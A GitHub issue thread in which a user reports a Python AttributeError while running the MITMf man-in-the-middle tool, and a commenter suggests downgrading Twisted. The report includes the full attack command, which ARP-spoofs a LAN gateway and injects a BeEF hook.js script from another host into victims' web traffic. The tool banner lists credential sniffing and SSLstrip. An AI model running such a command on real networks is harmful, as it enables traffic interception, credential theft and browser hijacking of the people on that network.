### ISSUE TITLE
AttributeError: ClientRequest instance has no attribute 'headers'

### ISSUE THREAD

**Issue by jcc09** [byt3bl33d3r/MITMf#433]
Hi im getting this error trying to run mitmf with beef,

root@kali:~# mitmf --spoof --arp -i wlan0 --gateway 192.168.0.1 --inject --js-url http://192.168.0.10:3000/hook.js

███╗   ███╗██╗████████╗███╗   ███╗███████╗
████╗ ████║██║╚══██╔══╝████╗ ████║██╔════╝
██╔████╔██║██║   ██║   ██╔████╔██║█████╗  
██║╚██╔╝██║██║   ██║   ██║╚██╔╝██║██╔══╝  
██║ ╚═╝ ██║██║   ██║   ██║ ╚═╝ ██║██║     
╚═╝     ╚═╝╚═╝   ╚═╝   ╚═╝     ╚═╝╚═╝     

[*] MITMf v0.9.8 - 'The Dark Side'
|_ Inject v0.4
|_ Spoof v0.6
|  |_ ARP spoofing enabled
|
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ Net-Creds v1.0 online
|_ MITMf-API online
 * Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)
|_ HTTP server online
|_ DNSChef v0.4 online
|_ SMB server online

2017-12-03 21:11:11 [ProxyPlugins] Exception occurred in hooked function
Traceback (most recent call last):
  File "/usr/share/mitmf/core/proxyplugins.py", line 112, in hook
    a = f(**args)
  File "/usr/share/mitmf/plugins/inject.py", line 65, in response
    mime = response.headers['Content-Type']
AttributeError: ClientRequest instance has no attribute 'headers'

Im using Kali Rolling 2017-2, and already installed Twisted==17.9.0,

**Comment by m-imran79** [comment]
I get the same issue, don't know how to fix it. Could anyone please make a youtube video.

**Comment by nikallass** [comment]
pip install Twisted==15.5.0
